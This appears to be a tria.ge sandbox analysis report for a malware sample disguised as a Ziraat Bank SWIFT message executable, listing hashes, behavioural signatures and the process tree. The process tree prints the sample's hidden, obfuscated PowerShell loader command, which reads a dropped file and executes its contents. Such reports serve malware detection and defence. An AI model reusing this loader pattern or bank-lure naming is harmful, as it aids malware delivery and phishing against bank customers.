Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    12/02/2024, 08:00

General

  • Target

    Ziraat Bankasi Swift Mesaji.exe

  • Size

    597KB

  • MD5

    a274d0c65826b298b45033815bc71b61

  • SHA1

    29eb31fdb53855665cf431228fea0b77f06baaec

  • SHA256

    53ad1aa3ff4f3dcb953f2e7560738f21c8cdadd91a61338e92b50a04943e01d6

  • SHA512

    f9160f4f901cac71a8ff1de984c1c5f66155e5afbc08159bb7187cdaf94b94aeb7d6cee955614e2c52adc59cfad09d9216f34262c7c7576bef441787c278aa85

  • SSDEEP

    12288:JpQq5jqzpAsdU0rnwP6865exdPIpdL3zonZbPX9i1CZhySGA:Jpr57rF652dQpdbkx01WySGA

Score
7/10

Malware Config

Signatures

  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Ziraat Bankasi Swift Mesaji.exe
    "C:\Users\Admin\AppData\Local\Temp\Ziraat Bankasi Swift Mesaji.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2856
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Forstrkkes=Get-Content 'C:\Users\Admin\AppData\Local\uncreative\sustain\prosadigte\Algoesthesiometer\Kvitteringer\Naaletrs.Mor';$genteknologien=$Forstrkkes.SubString(46118,3);.$genteknologien($Forstrkkes)"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2160

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\nso14E9.tmp\nsExec.dll

    Filesize

    6KB

    MD5

    b5a1f9dc73e2944a388a61411bdd8c70

    SHA1

    dc9b20df3f3810c2e81a0c54dea385704ba8bef7

    SHA256

    288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

    SHA512

    b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

  • memory/2160-15-0x00000000735E0000-0x0000000073B8B000-memory.dmp

    Filesize

    5.7MB

  • memory/2160-16-0x00000000735E0000-0x0000000073B8B000-memory.dmp

    Filesize

    5.7MB

  • memory/2160-17-0x0000000002680000-0x00000000026C0000-memory.dmp

    Filesize

    256KB

  • memory/2160-18-0x0000000002680000-0x00000000026C0000-memory.dmp

    Filesize

    256KB

  • memory/2160-19-0x00000000735E0000-0x0000000073B8B000-memory.dmp

    Filesize

    5.7MB